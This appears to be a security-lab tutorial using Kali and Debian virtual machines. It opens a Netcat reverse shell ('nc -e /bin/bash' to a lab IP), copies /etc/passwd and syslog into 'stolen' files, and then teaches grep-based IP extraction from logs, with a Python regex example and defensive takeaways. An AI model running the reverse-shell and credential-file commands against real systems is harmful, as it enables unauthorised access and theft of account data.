
Step-by-Step Guide: Reverse TCP Connection and Data Extraction from Debian VM Using Kali Linux

In this tutorial, we use two virtual machines: a Kali Linux VM (the attacker) and a Debian VM (the target). We first log in to the Debian VM from Kali over SSH so that we can run commands on it, then use Netcat to make the Debian VM open a reverse TCP connection back to Kali, and finally use the shell that arrives over that connection to collect sensitive information such as the account list and the system log.

1. Setting Up the Listener on Kali VM

First, we set up a listener on the Kali VM. Netcat will wait for an incoming TCP connection on port 1234:

nc -lvp 1234

Here -l puts Netcat in listen mode, -v makes it print the address of whoever connects, and -p 1234 selects the port. The command blocks and prints nothing until the Debian side connects. (On Kali, nc is the traditional GNU/Hobbit Netcat; the OpenBSD variant found on many Debian hosts has slightly different options, which matters for the next step.)

2. Establishing a Reverse TCP Connection on Debian VM

Next, on the Debian VM (IP: 192.168.83.128), we run Netcat so that it connects out to Kali and attaches a shell to the connection:

nc -e /bin/bash 192.168.83.129 1234

This connects to the Kali VM (IP 192.168.83.129) on port 1234 and, because of -e, starts /bin/bash with its standard input, output and error wired to the socket: whatever is typed into the listener on Kali is executed on Debian, and the output travels back over the same connection. Because the target initiates the connection ("reverse" shell), a perimeter firewall that only blocks inbound traffic does not stop it; only egress filtering does.

Caveat: the -e option exists in netcat-traditional (nc.traditional) and in Nmap's ncat, but not in netcat-openbsd, which is the nc package Debian installs by default. On such a host the same effect is obtained with a named pipe (mkfifo) feeding a shell, or with bash's /dev/tcp pseudo-device.

3. Confirming the Connection

Once the reverse connection is established, the listener on Kali prints the connecting address and then simply waits for input; there is no prompt, because the remote bash is not interactive. Commands typed into the listener are executed on the Debian VM. To confirm that you are really on the Debian host, type:

cat /etc/issue

This prints Debian's pre-login banner, which names the release. /etc/os-release carries the same information in a machine-readable form if you need it in a script.

4. Stealing Password Data

Now that we have a shell on the Debian VM, let's gather some data. First, we retrieve /etc/passwd, which lists every local account with its user name, UID, home directory and login shell. It is world-readable by design; the password hashes live in /etc/shadow, which only root can read. We save a copy as stolendata.txt:

cat /etc/passwd > stolendata.txt

Note where this file ends up: the redirect is executed by the remote bash, so stolendata.txt is written on the Debian VM, in the working directory of that shell, not on Kali. Nothing has left the target yet. To actually pull the data across, display it in the reverse shell and capture the listener's output on Kali (for instance by piping the listener through tee). To verify that the copy was written, display it:

cat stolendata.txt

On this lab VM, two accounts have /bin/bash as their login shell: root and password. The remaining entries are typically system accounts whose shell is /usr/sbin/nologin or /bin/false, which is why the login shell column is the first thing to scan for.

5. Stealing the Syslog

Next, we capture the system log. syslog records service starts and stops, authentication events, DHCP leases and similar activity, so it is valuable both to an attacker mapping the host and to a defender reconstructing what happened. Store a copy as stolenlog.txt (again, this file is created on the Debian side):

cat /var/log/syslog > stolenlog.txt

Two caveats. /var/log/syslog is normally readable only by root and by members of the adm group, so this step needs a privileged shell. It also exists only where rsyslog (or another syslog daemon) is installed; a Debian release that ships without rsyslog logs only to the systemd journal, where journalctl is the equivalent.

6. Analyzing the Stolen Log File

Once we have the log file, let's look at its contents. head and tail show the beginning and the end of a file; both print 10 lines by default, and -n sets a different count.

To view the first 10 lines:

head stolenlog.txt
OR
head -n 10 stolenlog.txt

To view the last 10 lines:

tail stolenlog.txt
OR
tail -n 10 stolenlog.txt

7. Filtering Lines That Contain an IP Address

The log contains numeric data of many kinds: timestamps, PIDs, lease times, IP addresses. The following grep keeps only the lines that contain something shaped like an IPv4 address, that is, four groups of one to three digits separated by dots:

grep -E '([0-9]{1,3}\.){3}[0-9]{1,3}' stolenlog.txt

This narrows the file down to network-related events. Note that grep filters but does not sort; to order the matching lines, pipe them through sort (sort -V compares dotted numbers numerically rather than as text, so 9.9.9.9 sorts before 10.0.0.1). The limits of this pattern are discussed in question 1 below.

8. Counting Matching Lines

If the log file is too large to read through, count how many lines contain an IP address by adding -c, which prints the number of matching lines instead of the lines themselves:

grep -cE '([0-9]{1,3}\.){3}[0-9]{1,3}' stolenlog.txt

(For the total number of lines in the file regardless of content, use wc -l.)

9. Extracting the IP Addresses Themselves

To pull out only the addresses rather than whole log lines, add -o, which prints each match on its own line:

grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' stolenlog.txt

This prints every IPv4-looking string found in stolenlog.txt, one per line. Piping that output through sort and uniq -c gives a quick count per address, which is usually the first question when triaging a log: which host shows up most often.

Discussion Questions

1. What is an issue with this IP address search pattern?

The pattern ([0-9]{1,3}\.){3}[0-9]{1,3} already allows one to three digits per group, so it does match addresses with short segments such as 192.168.12.1. Its real weaknesses are different. It accepts any value from 0 to 999 in each position, so a string like 300.1.1.1 is reported as an address even though no octet can exceed 255. It has no boundary checks, so it also matches inside longer dotted numbers, for example the first four parts of a version string such as 1.2.3.4.5 or of a timestamp written with dots. A stricter pattern limits each octet to 0-255 and requires that the match is not glued to another digit, or to a dot followed by a digit, on either side. For reference, the command as used above:

grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' stolenlog.txt

Finally, the pattern matches IPv4 only; IPv6 addresses such as 2001:db8::1 (hexadecimal groups separated by colons) need a separate pattern.
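The filter, count and extract steps (sections 7 to 9) and the stricter pattern discussed in question 1, together in one added example that is not part of the original tutorial. The log lines are constructed for this example (host name, PIDs and addresses are made up); the naive pattern is the tutorial's own, and the strict pattern, the helper names and the sort/count functions are this example's additions.

```python
"""Log triage: grep-style IPv4 extraction with the naive and a tightened pattern."""
import ipaddress
import re
from collections import Counter

# Constructed sample log: a scan-like burst from one host, a version string and an
# out-of-range "address" that the tutorial's regex wrongly picks up, and an IPv6 peer.
SAMPLE_SYSLOG = """\
Mar  3 10:15:01 debian sshd[1021]: Accepted password for user from 192.168.83.129 port 51234 ssh2
Mar  3 10:15:07 debian sshd[1021]: Failed password for root from 10.0.0.77 port 40022 ssh2
Mar  3 10:15:09 debian sshd[1021]: Failed password for root from 10.0.0.77 port 40023 ssh2
Mar  3 10:16:30 debian kernel: [ 1234.5678] eth0: link up
Mar  3 10:17:02 debian apt[2201]: installed libfoo 1.2.3.4.5
Mar  3 10:18:44 debian dhclient[880]: bound to 192.168.83.128 -- renewal in 300 seconds.
Mar  3 10:19:00 debian myapp[3000]: peer 300.1.1.1 rejected
Mar  3 10:19:05 debian myapp[3000]: peer 2001:db8::1 connected
Mar  3 10:20:10 debian ntpd[900]: reply from 9.9.9.9.
"""

# The tutorial's pattern: three "1-3 digits plus dot" groups and a final 1-3 digits.
NAIVE_IPV4 = re.compile(r"([0-9]{1,3}\.){3}[0-9]{1,3}")

# Tightened version (this example's addition): each octet limited to 0-255, and the
# match may not continue a longer dotted number on either side, so 1.2.3.4.5 is not
# cut down to 1.2.3.4. A sentence-ending dot after the address is still accepted.
OCTET = r"(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])"
STRICT_IPV4 = re.compile(
    r"(?<![0-9])(?<![0-9]\.)" + OCTET + r"(?:\." + OCTET + r"){3}(?![0-9])(?!\.[0-9])"
)


def extract_ipv4(text, strict=True):
    """Equivalent of `grep -oE PATTERN`: every match, in order of appearance.

    finditer()/group(0) is used deliberately: findall() would return only the
    capturing group of the naive pattern (the last "NNN." fragment), not the address.
    """
    pattern = STRICT_IPV4 if strict else NAIVE_IPV4
    return [m.group(0) for m in pattern.finditer(text)]


def lines_with_ipv4(lines, strict=True):
    """Equivalent of `grep -E PATTERN`; `grep -cE` is simply len() of this list."""
    return [line for line in lines if extract_ipv4(line, strict)]


def unique_sorted_ipv4(ips):
    """Numeric order like `sort -uV`; a text sort puts 9.9.9.9 after 192.168.83.129."""
    return [str(ip) for ip in sorted({ipaddress.IPv4Address(ip) for ip in ips})]


def top_talkers(lines, n=3):
    """Most frequent addresses, the `sort | uniq -c | sort -rn` of section 9."""
    return Counter(ip for line in lines for ip in extract_ipv4(line)).most_common(n)


if __name__ == "__main__":
    lines = SAMPLE_SYSLOG.splitlines()
    print("naive :", extract_ipv4(SAMPLE_SYSLOG, strict=False))
    print("strict:", extract_ipv4(SAMPLE_SYSLOG))
    print("sorted:", unique_sorted_ipv4(extract_ipv4(SAMPLE_SYSLOG)))
    print("top   :", top_talkers(lines))
```

On the sample, the naive pattern reports 1.2.3.4 (from the version string) and 300.1.1.1, both false positives, while the strict pattern returns only the four real addresses and still finds 9.9.9.9 despite the full stop after it. Neither pattern sees the IPv6 peer, which is the remaining gap noted above.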

2. How would being able to search for IP addresses in logs be useful in security?

Logs are essential in tracking system activities. They provide valuable information on what services were running, what actions were executed, which ports were in use, and much more. Being able to search for IP addresses in logs is crucial in security for identifying suspicious activities or unauthorized access. For example, if an IP address appears repeatedly in error logs, or if a new IP is seen accessing sensitive files, security teams can investigate further to mitigate any potential threat.

3. What other numbers may be important to search for on a computer?

Besides IP addresses, other numbers that are important to search for include:

  • Port Numbers: Port numbers indicate which services or applications are running on specific ports. Monitoring port activity helps identify unauthorized or malicious services.

  • MAC Addresses: These are unique identifiers assigned to network interfaces, essential for identifying devices within a network. MAC addresses can be crucial in tracking the physical devices involved in network activities.

By searching for these and other key identifiers, security professionals can better understand what is happening on a system and take appropriate action when needed.

Conclusion

In this article, we logged in to a Debian VM from Kali over SSH, used Netcat to make the Debian VM open a reverse TCP connection back to Kali, and used the shell that arrived over that connection to collect the system's account list and log. The exercise shows why outbound connections deserve as much attention as inbound ones: the target initiated the connection, so a firewall that only blocks inbound traffic would not have stopped it. Egress filtering, alerting on shells started with a network socket as their standard input, and keeping /var/log readable only by root and the adm group are the corresponding defensive measures.
